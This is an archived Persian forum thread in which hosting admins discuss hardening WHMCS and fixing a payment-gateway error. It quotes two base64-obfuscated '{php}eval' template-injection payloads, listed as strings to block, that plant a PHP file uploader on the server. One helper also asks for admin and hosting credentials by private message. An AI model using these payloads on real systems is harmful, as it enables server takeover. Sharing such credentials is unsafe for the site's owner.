PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : مشکل امنیتی در whmcs

SoltanHost.Net
January 5th, 2014, 17:08
سلام دوستان در تاپیکی در همین انجمن مطلبی رو مشاهده و یاد گرفتم که درصدی از امنیت WHMCS رو تامین کنم ولی در بعضی جاهاش به مشکل برخودم که از استادان یا یوزر های محترم

ممنون میشم که به سوالاتم پاسخ دهند

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــ
سوال اول :

برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

را بلوک کنید

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــــ

این سوال اول بود که اصلا نفهمیدم کجا رو میگه ! اینم سوال دومم

== >
دسترسی فایل کانفیگم بذارید رو 444

اینم دقیق نمی دونم چی رو میگه !

سپاس گزار میشم که اگه پاسخم رو بدید

Ashkankamangar.ir
January 5th, 2014, 17:15
مورد اول
برید به این آدرس
http://clients.site.com/admin/configticketspamcontrol.php
مورد دوم هم برید داخل سیپنلتون و سطح دسترسی فایل
configuration.php رو روی 400 بذارید

vahab00
January 5th, 2014, 17:16
کد اول نباید ارسال بشه از طرف کاربر
فایل دوم هم همون configortion.php هست
پریمیشن 400 بهتر هست

M-Sadeghi
January 5th, 2014, 17:19
یعنی فایل مدیریت رو تغییر اسم بدید و در فایل کانفیگ (configuration.php) این خط رو اضافه کنید

$customadminpath = ' name admin';
بجای نیم ادمین اسم فایل ادمین که تغییر دادید رو بنویسید.

SoltanHost.Net
January 5th, 2014, 17:29
سپاس از همه دوستان ، اقای ام - صادقی من همین کار رو کاملا درست انجام دادم ولی وقتی میزنم وارد پنل ادمینم بشه مثل

http://my damin name.com/adminpanel

یعنی ادمین رو به ادمین پنل اسم پوشه رو تغیر دادم ولی حالا که این ادرس رو میزنم می نویسه Language Folder Not Found چیکار کنم الان ؟

SoltanHost.Net
January 5th, 2014, 18:31
آپ ....

ULTRAWEB
January 5th, 2014, 18:35
آقا شما اگر از نسخه جدید استفاده کنی نیازی نیست به این تنظیمات اصلا نیست
توی انجمن نسخه ی 5.2.15رو خودم گذاشتم کامل هست که باید نصب کنین

SoltanHost.Net
January 5th, 2014, 18:47
سلام بله از اخرین نسخه استفاده میکنم ولی یه هکر ایرانی هکش کرده بود ! اونم اخرین نسخه بود

الان به این مشکل هنگام پرداخت بر میخورم توی انجمن هم تاپیک ها رو مشاهده و طبق گفتهشون پیش رفتم همه چیز درسته ولی نمی دونم چرا این ارور رو میده

اینم ارور : Gateway Module '' is Missing or Invalid

SoltanHost.Net
January 5th, 2014, 19:09
آپ ... ( تاپیک رو بالا نگه میدارم تا عزیزان جواب بدن )

arvin_b
January 5th, 2014, 19:17
سلام
در مورد اسم
باید هم اسم فایل را تغییر بدید هم در فایل کانفیگ $customadminpath = ' name admin'; را اضافه کنید دقیق انجام بدید نباید مشکلی باشه

موفق باشید

M-Sadeghi
January 5th, 2014, 19:20
سپاس از همه دوستان ، اقای ام - صادقی من همین کار رو کاملا درست انجام دادم ولی وقتی میزنم وارد پنل ادمینم بشه مثل

http://my damin name.com/adminpanel

یعنی ادمین رو به ادمین پنل اسم پوشه رو تغیر دادم ولی حالا که این ادرس رو میزنم می نویسه Language Folder Not Found چیکار کنم الان ؟

نوشته زبان فولدر پیدا نشد چک کنید ببینید درست وارد کردید

SoltanHost.Net
January 5th, 2014, 19:23
سلام
در مورد اسم
باید هم اسم فایل را تغییر بدید هم در فایل کانفیگ $customadminpath = ' name admin'; را اضافه کنید دقیق انجام بدید نباید مشکلی باشه

موفق باشید

سپاس دوست گلم ، درست شد ! همین رو گزاشتم و ست کردم ردیف شد اما مشکل سومم اینه

مشکل هنگام پرداخت بر میخورم توی انجمن هم تاپیک ها رو مشاهده و طبق گفتهشون پیش رفتم همه چیز درسته ولی نمی دونم چرا این ارور رو میده

اینم ارور :
Gateway Module '' is Missing or Invalid

ـــــــــــــــــ نمی دونم چطوری حلش کنم

arvin_b
January 5th, 2014, 19:43
سپاس دوست گلم ، درست شد ! همین رو گزاشتم و ست کردم ردیف شد اما مشکل سومم اینه

مشکل هنگام پرداخت بر میخورم توی انجمن هم تاپیک ها رو مشاهده و طبق گفتهشون پیش رفتم همه چیز درسته ولی نمی دونم چرا این ارور رو میده

اینم ارور :

Gateway Module '' is Missing or Invalid

ـــــــــــــــــ نمی دونم چطوری حلش کنم

سلام
فکر میکنم ماژولتون مشکل داره

ماژول برای چه درگاهی هست ؟

کلا ارور میده یا اینکه در مرحله انتقال برای پرداخت بانکی ارور میده

SoltanHost.Net
January 5th, 2014, 19:53
سلام
فکر میکنم ماژولتون مشکل داره

ماژول برای چه درگاهی هست ؟

کلا ارور میده یا اینکه در مرحله انتقال برای پرداخت بانکی ارور میده

وقتی که محصول رو سفارش میدم به مرحله ای میرسه که فاکتور رو نشون بده این ارور رو میده / از درگاه پی لاین استفاده میکنم payline.ir

SoltanHost.Net
January 5th, 2014, 20:15
آپ ... فعلا تاپیک رو بالا نگه داشتم مشکل جدی دارم !

SoltanHost.Net
January 5th, 2014, 20:53
دوباره آپ ... دوستان پاسخ بدن مشکل اسای هستش مشتریانم موندن

arvin_b
January 5th, 2014, 22:56
وقتی که محصول رو سفارش میدم به مرحله ای میرسه که فاکتور رو نشون بده این ارور رو میده / از درگاه پی لاین استفاده میکنم payline.ir

api را چک کنید که مشکلی نداشته باشه ای پی سرور با آی پی اعلامی هم خوانی داشته باشه

در صورت امکان یک یوزر با دسترسی ادمین و همچنین اطلاعات ورود به هاست را برای بنده پ خ ارسال کنید تا سریعتر برسی بشه و مشکل در صورت امکان رفع بشه

موفق باشید

SoltanHost.Net
January 6th, 2014, 11:53
api را چک کنید که مشکلی نداشته باشه ای پی سرور با آی پی اعلامی هم خوانی داشته باشه

در صورت امکان یک یوزر با دسترسی ادمین و همچنین اطلاعات ورود به هاست را برای بنده پ خ ارسال کنید تا سریعتر برسی بشه و مشکل در صورت امکان رفع بشه

موفق باشید

سلام سپاس دوست عزیز فایل table.sql در دیتابیس امپورت نشده بود بخاطر همین ! سپاس از همه دوستان ... ( امنیت رو تا 90٪ پیش بردم ! :D )